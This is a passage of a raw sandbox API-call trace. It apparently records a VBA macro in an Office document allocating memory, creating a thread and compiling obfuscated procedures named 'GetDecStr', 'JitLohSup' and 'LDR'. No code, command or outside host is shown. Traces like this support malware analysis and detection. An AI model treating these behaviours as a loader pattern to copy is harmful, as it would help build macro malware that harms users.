riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206fb0 | out: ppvObject=0x206fb0*=0x0) returned 0x80004002 [0045.332] IUnknown:Release (This=0x7f723a0) returned 0x2 [0045.332] IUnknown:AddRef (This=0x7f72450) returned 0x7 [0045.332] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206fb8 | out: ppvObject=0x206fb8*=0x0) returned 0x80004002 [0045.332] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206fb0 | out: ppvObject=0x206fb0*=0x0) returned 0x80004002 [0045.332] IUnknown:Release (This=0x7f72450) returned 0x6 [0045.332] IUnknown:AddRef (This=0x7f722f0) returned 0x2 [0045.332] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206fb8 | out: ppvObject=0x206fb8*=0x0) returned 0x80004002 [0045.332] IUnknown:QueryInterface (in: This=0x7f722f0, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x206fb0 | out: ppvObject=0x206fb0*=0x0) returned 0x80004002 [0045.332] IUnknown:Release (This=0x7f722f0) returned 0x1 [0045.332] IMalloc:Alloc (This=0x7feff045380, cb=0x8) returned 0x8188410 [0045.332] IMalloc:GetSize (This=0x7feff045380, pv=0x8188410) returned 0x8 [0045.332] IMalloc:Alloc (This=0x7feff045380, cb=0x78) returned 0x810ff30 [0045.332] IMalloc:GetSize (This=0x7feff045380, pv=0x810ff30) returned 0x78 [0045.333] IUnknown:AddRef (This=0x7f72450) returned 0x7 [0045.333] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207098 | out: ppvObject=0x207098*=0x0) returned 0x80004002 [0045.333] IUnknown:QueryInterface (in: This=0x7f72450, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x207090 | out: ppvObject=0x207090*=0x0) returned 0x80004002 [0045.333] IUnknown:Release (This=0x7f72450) returned 0x6 [0045.333] IMalloc:Alloc (This=0x7feff045380, cb=0x8) returned 0x8188420 [0045.333] IMalloc:GetSize (This=0x7feff045380, pv=0x8188420) returned 0x8 [0045.333] IMalloc:Alloc (This=0x7feff045380, cb=0x78) returned 0x810ffb0 [0045.333] IMalloc:GetSize (This=0x7feff045380, pv=0x810ffb0) returned 0x78 [0045.333] IMalloc:Alloc (This=0x7feff045380, cb=0x8) returned 0x8188430 [0045.333] IMalloc:GetSize (This=0x7feff045380, pv=0x8188430) returned 0x8 [0045.333] IMalloc:Alloc (This=0x7feff045380, cb=0x78) returned 0x8110030 [0045.333] IMalloc:GetSize (This=0x7feff045380, pv=0x8110030) returned 0x78 [0045.334] IMalloc:Free (This=0x7feff045380, pv=0x7f183d0) [0045.335] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0045.335] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0045.335] IMalloc:Alloc (This=0x7feff045380, cb=0x40) returned 0x7fc2180 [0045.335] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\VBA\\7.1\\Common", ulOptions=0x0, samDesired=0x1, phkResult=0x206650 | out: phkResult=0x206650*=0xa04) returned 0x0 [0045.335] RegQueryValueExA (in: hKey=0xa04, lpValueName="VbaCapability", lpReserved=0x0, lpType=0x0, lpData=0x206648, lpcbData=0x206640*=0x4 | out: lpType=0x0, lpData=0x206648*=0xad, lpcbData=0x206640*=0x4) returned 0x2 [0045.336] RegCloseKey (hKey=0xa04) returned 0x0 [0045.336] DispCallFunc (pvInstance=0x8110030, oVft=0xe00, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x206870) returned 0x0 [0045.336] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x7fee3c91778, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x206330 | out: lpThreadId=0x206330*=0xac0) returned 0xa04 [0045.337] PeekMessageA (in: lpMsg=0x2062d0, hWnd=0x101fa, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x2062d0) returned 0 [0045.339] GetActiveWindow () returned 0x201c4 [0045.339] _mbscpy_s (in: _Dst=0x205920, _DstSizeInBytes=0xd, _Src=0x30d2f5a | out: _Dst=0x205920) returned 0x0 [0045.340] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba4c60 [0045.340] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x30) returned 0x7d58350 [0045.340] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3af0000 [0045.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x811bd94, cbMultiByte=9, lpWideCharStr=0x3af00dc, cchWideChar=20 | out: lpWideCharStr="adeetrvdf") returned 9 [0045.341] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6ef30 [0045.341] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x200) returned 0x8061af0 [0045.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x811bdac, cbMultiByte=4, lpWideCharStr=0x3af02bc, cchWideChar=10 | out: lpWideCharStr="Wrst") returned 4 [0045.341] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Duren") returned 0x1098d2 [0045.341] strcpy_s (in: _Dst=0x2049d0, _DstSize=0x6, _Src="Duren" | out: _Dst="Duren") returned 0x0 [0045.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2049d0, cbMultiByte=6, lpWideCharStr=0x204820, cchWideChar=6 | out: lpWideCharStr="Duren") returned 6 [0045.341] IUnknown:AddRef (This=0x7edf740) returned 0x8 [0045.341] ITypeLib:RemoteIsName (in: This=0x7edf740, szNameBuf="Duren", lHashVal=0x1098d2, pfName=0x2048f0, pBstrLibName=0x204820 | out: pfName=0x2048f0*=0, pBstrLibName=0x204820) returned 0x0 [0045.341] IUnknown:Release (This=0x7edf740) returned 0x7 [0045.341] IUnknown:AddRef (This=0x3dd7b80) returned 0x12 [0045.341] ITypeLib:RemoteIsName (in: This=0x3dd7b80, szNameBuf="Duren", lHashVal=0x1098d2, pfName=0x2048f0, pBstrLibName=0x204820 | out: pfName=0x2048f0*=0, pBstrLibName=0x204820) returned 0x0 [0045.342] IUnknown:Release (This=0x3dd7b80) returned 0x11 [0045.342] IUnknown:AddRef (This=0x7ee0550) returned 0x9 [0045.342] ITypeLib:RemoteIsName (in: This=0x7ee0550, szNameBuf="Duren", lHashVal=0x1098d2, pfName=0x2048f0, pBstrLibName=0x204820 | out: pfName=0x2048f0*=0, pBstrLibName=0x204820) returned 0x0 [0045.342] IUnknown:Release (This=0x7ee0550) returned 0x8 [0045.342] IUnknown:AddRef (This=0x7edffb0) returned 0x7 [0045.342] ITypeLib:RemoteIsName (in: This=0x7edffb0, szNameBuf="Duren", lHashVal=0x1098d2, pfName=0x2048f0, pBstrLibName=0x204820 | out: pfName=0x2048f0*=0, pBstrLibName=0x204820) returned 0x0 [0045.342] IUnknown:Release (This=0x7edffb0) returned 0x6 [0045.342] IUnknown:Release (This=0x7f723a0) returned 0x3 [0045.342] IUnknown:Release (This=0x7f723a0) returned 0x2 [0045.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3952b96, cbMultiByte=6, lpWideCharStr=0x204950, cchWideChar=7 | out: lpWideCharStr="Duren") returned 6 [0045.342] ITypeComp:RemoteBind (in: This=0x7f723a8, szName="Duren", lHashVal=0x1098d2, wFlags=0x1, ppTInfo=0x204908, pDescKind=0x20491c, ppFuncDesc=0x204920, ppVarDesc=0x7feff382ca4, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x204908*=0x0, pDescKind=0x20491c*=0, ppFuncDesc=0x204920, ppVarDesc=0x7feff382ca4, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0045.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="025e399ea6", cchWideChar=11, lpMultiByteStr=0x204680, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="025e399ea6", lpUsedDefaultChar=0x0) returned 11 [0045.342] GetLocalTime (in: lpSystemTime=0x204768 | out: lpSystemTime=0x204768*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xb, wMilliseconds=0x6f)) [0045.342] _ultow_s (in: _Value=0x5e399ea7, _Buffer=0x81d7594, _BufferCount=0x9, _Radix=16 | out: _Buffer="5e399ea7") returned 0x0 [0045.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="075e399ea7", cchWideChar=11, lpMultiByteStr=0x2046c0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="075e399ea7", lpUsedDefaultChar=0x0) returned 11 [0045.342] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c9e0 [0045.342] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x81e4260 [0045.342] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x81e41a0 [0045.342] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d9440 [0045.342] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d9690 [0045.342] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d98e0 [0045.343] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0045.343] IMalloc:Free (This=0x7feff045380, pv=0x7ba54f0) [0045.343] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0045.343] IMalloc:Free (This=0x7feff045380, pv=0x7ba54f0) [0045.343] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0045.343] IMalloc:Free (This=0x7feff045380, pv=0x7ba54f0) [0045.343] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0045.343] IMalloc:Free (This=0x7feff045380, pv=0x7ba54f0) [0045.343] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0045.343] IMalloc:Free (This=0x7feff045380, pv=0x7ba54f0) [0045.343] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0045.343] IMalloc:Free (This=0x7feff045380, pv=0x7ba54f0) [0045.343] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0045.343] IMalloc:Free (This=0x7feff045380, pv=0x7ba54f0) [0045.343] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0045.343] IMalloc:Free (This=0x7feff045380, pv=0x7ba54f0) [0045.343] IMalloc:Alloc (This=0x7feff045380, cb=0x810) returned 0x7ba54f0 [0045.343] IMalloc:Free (This=0x7feff045380, pv=0x7ba54f0) [0045.344] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2bfe, cbMultiByte=10, lpWideCharStr=0x203d10, cchWideChar=11 | out: lpWideCharStr="Bookmarks") returned 10 [0045.344] IMalloc:Alloc (This=0x7feff045380, cb=0x640) returned 0x81e9230 [0045.344] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfe8e0 [0045.344] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188440 [0045.344] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188450 [0045.344] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfe910 [0045.344] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c950 [0045.344] ITypeComp:RemoteBindType (in: This=0x7edf750, szName="Bookmarks", lHashVal=0x106e3f, ppTInfo=0x203cc8 | out: ppTInfo=0x203cc8*=0x0) returned 0x0 [0045.345] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2bfe, cbMultiByte=10, lpWideCharStr=0x203d10, cchWideChar=11 | out: lpWideCharStr="Bookmarks") returned 10 [0045.345] ITypeComp:RemoteBindType (in: This=0x3dd7b90, szName="Bookmarks", lHashVal=0x106e3f, ppTInfo=0x203cc8 | out: ppTInfo=0x203cc8*=0x7f724a8) returned 0x0 [0045.345] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f724a8, ppTypeAttr=0x203cd0, pDummy=0x7f724f8 | out: ppTypeAttr=0x203cd0, pDummy=0x7f724f8*=0xff420660) returned 0x0 [0045.345] ITypeInfo:LocalReleaseTypeAttr (This=0x7f724a8) returned 0x0 [0045.345] ITypeInfo:GetRefTypeOfImplType (in: This=0x7f724a8, index=0xffffffff, pRefType=0x203d98 | out: pRefType=0x203d98*=0xfffffffe) returned 0x0 [0045.345] ITypeInfo:GetRefTypeInfo (in: This=0x7f724a8, hreftype=0xfffffffe, ppTInfo=0x203df0 | out: ppTInfo=0x203df0*=0x7f72500) returned 0x0 [0045.345] IUnknown:Release (This=0x7f724a8) returned 0x1 [0045.345] IUnknown:AddRef (This=0x7f72500) returned 0x2 [0045.345] IUnknown:Release (This=0x7f72500) returned 0x1 [0045.345] IUnknown:AddRef (This=0x7f72500) returned 0x2 [0045.345] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203ec0 | out: ppvObject=0x203ec0*=0x0) returned 0x80004002 [0045.345] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203e90 | out: ppvObject=0x203e90*=0x0) returned 0x80004002 [0045.345] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203e80 | out: ppvObject=0x203e80*=0x0) returned 0x80004002 [0045.345] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x203e88 | out: ppvObject=0x203e88*=0x0) returned 0x80004002 [0045.345] ITypeInfo:RemoteGetTypeAttr (in: This=0x7f72500, ppTypeAttr=0x203eb8, pDummy=0x10 | out: ppTypeAttr=0x203eb8, pDummy=0x10) returned 0x0 [0045.345] ITypeInfo:LocalReleaseTypeAttr (This=0x7f72500) returned 0x0 [0045.345] IUnknown:AddRef (This=0x7f72500) returned 0x3 [0045.345] IUnknown:Release (This=0x7f72500) returned 0x2 [0045.345] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4040b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x204418 | out: ppvObject=0x204418*=0x0) returned 0x80004002 [0045.345] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4042aa8*(Data1=0xcacc1e89, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2042f0 | out: ppvObject=0x2042f0*=0x0) returned 0x80004002 [0045.345] IUnknown:Release (This=0x7f72500) returned 0x2 [0045.345] IUnknown:Release (This=0x7f72500) returned 0x2 [0045.345] IUnknown:Release (This=0x7f72500) returned 0x2 [0045.345] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047d8 | out: ppvObject=0x2047d8*=0x0) returned 0x80004002 [0045.345] IUnknown:QueryInterface (in: This=0x7f72500, riid=0x7fee4035af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2047d8 | out: ppvObject=0x2047d8*=0x0) returned 0x80004002 [0045.346] IMalloc:Alloc (This=0x7feff045380, cb=0x68) returned 0x80705f0 [0045.346] IMalloc:Alloc (This=0x7feff045380, cb=0x68) returned 0x8070660 [0045.346] IMalloc:Alloc (This=0x7feff045380, cb=0x68) returned 0x80706d0 [0045.346] IMalloc:Alloc (This=0x7feff045380, cb=0x68) returned 0x8070740 [0045.346] IMalloc:Alloc (This=0x7feff045380, cb=0x18) returned 0x8003a10 [0045.346] IMalloc:Alloc (This=0x7feff045380, cb=0x48) returned 0x7fc21d0 [0045.346] strcpy_s (in: _Dst=0x81d9068, _DstSize=0x5, _Src="Rhoi" | out: _Dst="Rhoi") returned 0x0 [0045.346] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.346] GetCurrentProcess () returned 0xffffffffffffffff [0045.346] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x3d) returned 1 [0045.346] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.347] IMalloc:Alloc (This=0x7feff045380, cb=0x60) returned 0x80707b0 [0045.347] strcpy_s (in: _Dst=0x81d9078, _DstSize=0xa, _Src="GetDecStr" | out: _Dst="GetDecStr") returned 0x0 [0045.347] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x412) returned 0x3e6f380 [0045.347] strcpy_s (in: _Dst=0x7fd50a8, _DstSize=0x3, _Src="ET" | out: _Dst="ET") returned 0x0 [0045.347] strcpy_s (in: _Dst=0x7fd50b8, _DstSize=0x3, _Src="CS" | out: _Dst="CS") returned 0x0 [0045.347] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.347] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.347] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.347] GetCurrentProcess () returned 0xffffffffffffffff [0045.347] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x4d) returned 1 [0045.347] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.347] IMalloc:Alloc (This=0x7feff045380, cb=0x50) returned 0x7f183d0 [0045.347] strcpy_s (in: _Dst=0x81d9090, _DstSize=0x6, _Src="Duren" | out: _Dst="Duren") returned 0x0 [0045.347] strcpy_s (in: _Dst=0x7fd50c8, _DstSize=0x3, _Src="KL" | out: _Dst="KL") returned 0x0 [0045.347] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x81d9b30 [0045.347] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.347] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.347] GetCurrentProcess () returned 0xffffffffffffffff [0045.347] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x45) returned 1 [0045.347] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.347] IMalloc:Alloc (This=0x7feff045380, cb=0x50) returned 0x7f18490 [0045.347] strcpy_s (in: _Dst=0x81d90a0, _DstSize=0x5, _Src="ruti" | out: _Dst="ruti") returned 0x0 [0045.347] strcpy_s (in: _Dst=0x7fd50d8, _DstSize=0x3, _Src="UA" | out: _Dst="UA") returned 0x0 [0045.347] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.347] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.347] GetCurrentProcess () returned 0xffffffffffffffff [0045.347] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x45) returned 1 [0045.348] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.348] IMalloc:Alloc (This=0x7feff045380, cb=0x48) returned 0x7fc2220 [0045.348] strcpy_s (in: _Dst=0x81d90b0, _DstSize=0x6, _Src="Rerid" | out: _Dst="Rerid") returned 0x0 [0045.348] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.348] GetCurrentProcess () returned 0xffffffffffffffff [0045.348] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x3d) returned 1 [0045.348] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.348] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x813ae30 [0045.348] IMalloc:Alloc (This=0x7feff045380, cb=0x50) returned 0x7f184f0 [0045.348] strcpy_s (in: _Dst=0x81d90c0, _DstSize=0xd, _Src="GutDicSher65" | out: _Dst="GutDicSher65") returned 0x0 [0045.348] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.348] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.348] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.348] GetCurrentProcess () returned 0xffffffffffffffff [0045.348] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x4d) returned 1 [0045.348] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.348] IMalloc:Alloc (This=0x7feff045380, cb=0x60) returned 0x8070820 [0045.348] strcpy_s (in: _Dst=0x81d90d8, _DstSize=0xb, _Src="LOtDicSmal" | out: _Dst="LOtDicSmal") returned 0x0 [0045.348] strcpy_s (in: _Dst=0x7fd50e8, _DstSize=0x2, _Src="i" | out: _Dst="i") returned 0x0 [0045.348] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.348] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.348] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.348] GetCurrentProcess () returned 0xffffffffffffffff [0045.348] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x4d) returned 1 [0045.349] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.349] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x813b080 [0045.349] IMalloc:Alloc (This=0x7feff045380, cb=0x68) returned 0x813ee30 [0045.349] strcpy_s (in: _Dst=0x81d90f0, _DstSize=0xa, _Src="JitLohSup" | out: _Dst="JitLohSup") returned 0x0 [0045.349] strcpy_s (in: _Dst=0x7fd50f8, _DstSize=0x6, _Src="UPart" | out: _Dst="UPart") returned 0x0 [0045.349] strcpy_s (in: _Dst=0x7fd5108, _DstSize=0x6, _Src="LPart" | out: _Dst="LPart") returned 0x0 [0045.349] strcpy_s (in: _Dst=0x7fd5118, _DstSize=0x4, _Src="LDR" | out: _Dst="LDR") returned 0x0 [0045.349] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.349] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.349] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.349] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.349] GetCurrentProcess () returned 0xffffffffffffffff [0045.349] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x55) returned 1 [0045.349] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.349] IMalloc:Alloc (This=0x7feff045380, cb=0x50) returned 0x7f18550 [0045.349] strcpy_s (in: _Dst=0x81d9108, _DstSize=0xc, _Src="GetCorrPart" | out: _Dst="GetCorrPart") returned 0x0 [0045.349] strcpy_s (in: _Dst=0x7fd5128, _DstSize=0x5, _Src="Part" | out: _Dst="Part") returned 0x0 [0045.349] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.349] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.349] GetCurrentProcess () returned 0xffffffffffffffff [0045.349] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x45) returned 1 [0045.350] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.350] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x813b2d0 [0045.350] IMalloc:Alloc (This=0x7feff045380, cb=0x60) returned 0x813eea0 [0045.350] strcpy_s (in: _Dst=0x81d9120, _DstSize=0x6, _Src="Duram" | out: _Dst="Duram") returned 0x0 [0045.350] strcpy_s (in: _Dst=0x7fd5138, _DstSize=0x8, _Src="frau_67" | out: _Dst="frau_67") returned 0x0 [0045.350] strcpy_s (in: _Dst=0x7fd5148, _DstSize=0x5, _Src="Von1" | out: _Dst="Von1") returned 0x0 [0045.350] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.350] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.350] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.350] GetCurrentProcess () returned 0xffffffffffffffff [0045.350] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x4d) returned 1 [0045.350] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.350] IMalloc:Alloc (This=0x7feff045380, cb=0x60) returned 0x813ef10 [0045.350] strcpy_s (in: _Dst=0x81d9130, _DstSize=0x6, _Src="Yobna" | out: _Dst="Yobna") returned 0x0 [0045.350] strcpy_s (in: _Dst=0x7fd5158, _DstSize=0x5, _Src="sukl" | out: _Dst="sukl") returned 0x0 [0045.350] strcpy_s (in: _Dst=0x7fd5168, _DstSize=0x5, _Src="Trud" | out: _Dst="Trud") returned 0x0 [0045.350] IMalloc:Alloc (This=0x7feff045380, cb=0x26d) returned 0x81f6280 [0045.350] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.350] IMalloc:GetSize (This=0x7feff045380, pv=0x81f6280) returned 0x26d [0045.350] GetCurrentProcess () returned 0xffffffffffffffff [0045.350] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x81f6280, dwSize=0x4d) returned 1 [0045.350] IMalloc:Free (This=0x7feff045380, pv=0x81f6280) [0045.350] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x813b520 [0045.350] IMalloc:Alloc (This=0x7feff045380, cb=0x14) returned 0x8005530 [0045.350] IMalloc:Realloc (This=0x7feff045380, pv=0x8005530, cb=0x34) returned 0x7d55c50 [0045.351] IMalloc:Free (This=0x7feff045380, pv=0x7d55c50) [0045.351] IMalloc:Realloc (This=0x7feff045380, pv=0x8119ce0, cb=0x100) returned 0x810a1a0 [0045.351] IMalloc:Realloc (This=0x7feff045380, pv=0x7dff780, cb=0x40) returned 0x7fc2270 [0045.351] IMalloc:Realloc (This=0x7feff045380, pv=0x7dff240, cb=0x50) returned 0x7f185b0 [0045.351] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x10) returned 0x8005530 [0045.351] IMalloc:Alloc (This=0x7feff045380, cb=0x318) returned 0x7e14b30 [0045.351] IMalloc:Realloc (This=0x7feff045380, pv=0x7ba4c60, cb=0xaa) returned 0x81e4320 [0045.351] IMalloc:Free (This=0x7feff045380, pv=0x7f18430) [0045.351] GetCurrentProcess () returned 